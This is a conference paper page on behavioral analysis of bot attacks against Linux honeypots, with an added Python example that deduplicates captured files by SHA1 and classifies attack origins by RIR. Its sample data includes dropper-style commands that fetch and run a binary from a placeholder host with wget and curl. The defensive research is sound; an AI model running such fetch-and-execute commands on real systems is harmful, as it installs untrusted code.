
Behavioral Analysis of Bot Activity in Infected Systems Using Honeypots

  • Conference paper
  • Computer Networks (CN 2017)

Part of the book series: Communications in Computer and Information Science (CCIS, volume 718)

Abstract

New Internet threats emerge on a daily basis, and honeypots have become widely used for capturing them in order to investigate their activities. The paper focuses on a detailed analysis of the behavior of various attacks against seven Linux-based honeypots. The attacks were analyzed according to threat type, session duration, and the autonomous system (AS), country and regional Internet registry (RIR) of the attack origin. Clusters of similar objects were formed accordingly, and certain typical attack patterns usable for potential detection automation, as well as some aspects of threat dissemination, were identified.


Notes

  1. Available at https://github.com/CZ-NIC/kippo.

  2. https://csirt.cz.

  3. For details of how Kippo can be detected using the ps x command, see https://github.com/desaster/kippo/issues/39.

  4. For further possibilities of Kippo detection, see https://github.com/desaster/kippo/issues/190.

  5. VirusTotal service, see http://virustotal.com/.

  6. CSIRT = Computer Security Incident Response Team.

  7. Constituency means the part of the Internet where the CSIRT operates as an authority.

  8. Only files with an identical SHA1 hash were considered identical.

  9. Details are available at http://r-project.org.

  10. The unknown category includes ASes with no RIR data available. Usually this is the case for private ASes. Details can be found in IETF RFC 6996, Autonomous System (AS) Reservation for Private Use, available at https://tools.ietf.org/html/rfc6996.

  11. Details can be found at https://securingtomorrow.mcafee.com/consumer/family-safety/drive-by-download/.

  12. http://blog.malwaremustdie.org/2016/10/mmd-0060-2016-linuxudpfker-and-chinaz.html.

  13. According to Softpedia, see http://news.softpedia.com/news/mirai-ddos-trojan-is-the-next-big-threat-for-iot-devices-and-linux-servers-507964.shtml.
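Notes 8 and 10 describe two preprocessing rules used before attack records can be clustered: captured files are treated as the same sample only when their SHA1 hashes match, and sessions originating from an AS with no RIR data (typically a private AS, RFC 6996) fall into an "unknown" RIR category. The following is an added example, not code from the paper or from the Kippo project, showing both rules applied to constructed honeypot data. The RFC 6996 private ASN ranges are factual; the RIR lookup table, the sample downloads and the sample sessions are constructed for illustration.

```python
import hashlib
from collections import Counter

# RFC 6996: 16-bit private ASNs 64512-65534 and 32-bit private ASNs
# 4200000000-4294967294. These ranges are factual; no RIR publishes
# data for them, hence the paper's "unknown" category.
PRIVATE_ASN_RANGES = ((64512, 65534), (4200000000, 4294967294))

# Constructed ASN -> RIR table standing in for a real RIR/WHOIS lookup.
SAMPLE_RIR_LOOKUP = {3333: "RIPE NCC", 7018: "ARIN"}

# Constructed downloads captured by the honeypot: (filename, content).
# Two of them differ only in name, so SHA1 identifies them as one sample.
SAMPLE_DOWNLOADS = [
    ("x.sh", b"cd /tmp; wget http://example.invalid/bot; chmod +x bot; ./bot\n"),
    ("y.sh", b"cd /tmp; wget http://example.invalid/bot; chmod +x bot; ./bot\n"),
    ("z.sh", b"cd /tmp; curl -O http://example.invalid/other; ./other\n"),
]

# Constructed session records: origin ASN, country code and duration (s).
SAMPLE_SESSIONS = [
    {"asn": 3333, "country": "NL", "duration": 12},
    {"asn": 3333, "country": "NL", "duration": 240},
    {"asn": 7018, "country": "US", "duration": 3},
    {"asn": 65000, "country": "??", "duration": 58},   # private ASN
]


def is_private_asn(asn: int) -> bool:
    """True if the ASN lies in an RFC 6996 private-use range."""
    return any(lo <= asn <= hi for lo, hi in PRIVATE_ASN_RANGES)


def rir_category(asn: int, rir_lookup: dict) -> str:
    """Map an ASN to its RIR, or to 'unknown' when no RIR data exists.

    Private ASNs are classified as 'unknown' without consulting the table,
    matching the paper's note 10; any other ASN missing from the table also
    ends up as 'unknown'.
    """
    if is_private_asn(asn):
        return "unknown"
    return rir_lookup.get(asn, "unknown")


def sha1_hex(data: bytes) -> str:
    """Hex SHA1 digest used as the identity of a captured file (note 8)."""
    return hashlib.sha1(data).hexdigest()


def dedup_downloads(downloads):
    """Group captured files by SHA1; each key is one distinct sample.

    Returns {sha1_hex: [filenames that hashed to it]}.
    """
    unique = {}
    for name, content in downloads:
        unique.setdefault(sha1_hex(content), []).append(name)
    return unique


def summarize_sessions(sessions, rir_lookup):
    """Count sessions per RIR category, the grouping the paper clusters on."""
    return Counter(rir_category(s["asn"], rir_lookup) for s in sessions)


if __name__ == "__main__":
    for digest, names in dedup_downloads(SAMPLE_DOWNLOADS).items():
        print(digest, names)
    print(summarize_sessions(SAMPLE_SESSIONS, SAMPLE_RIR_LOOKUP))
```

The SHA1 step is kept exactly as the paper states it: identical hash means identical file, so a renamed copy of the same dropper collapses into one sample, while a single changed byte yields a new one. The RIR step deliberately checks the private ranges before the lookup table, so a stale or incomplete table cannot accidentally assign a registry to a private ASN.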


Acknowledgment

The paper was supported by the project No. SGS08/PrF/2017 Network Services Security of the Student Grant Competition of the University of Ostrava.

Author information

Corresponding author: Matej Zuzcak.

Copyright information

© 2017 Springer International Publishing AG

About this paper

Cite this paper

Zuzcak, M., Sochor, T. (2017). Behavioral Analysis of Bot Activity in Infected Systems Using Honeypots. In: Gaj, P., Kwiecień, A., Sawicki, M. (eds) Computer Networks. CN 2017. Communications in Computer and Information Science, vol 718. Springer, Cham. https://doi.org/10.1007/978-3-319-59767-6_10

  • DOI: https://doi.org/10.1007/978-3-319-59767-6_10

  • Publisher Name: Springer, Cham

  • Print ISBN: 978-3-319-59766-9

  • Online ISBN: 978-3-319-59767-6

  • eBook Packages: Computer Science (R0)
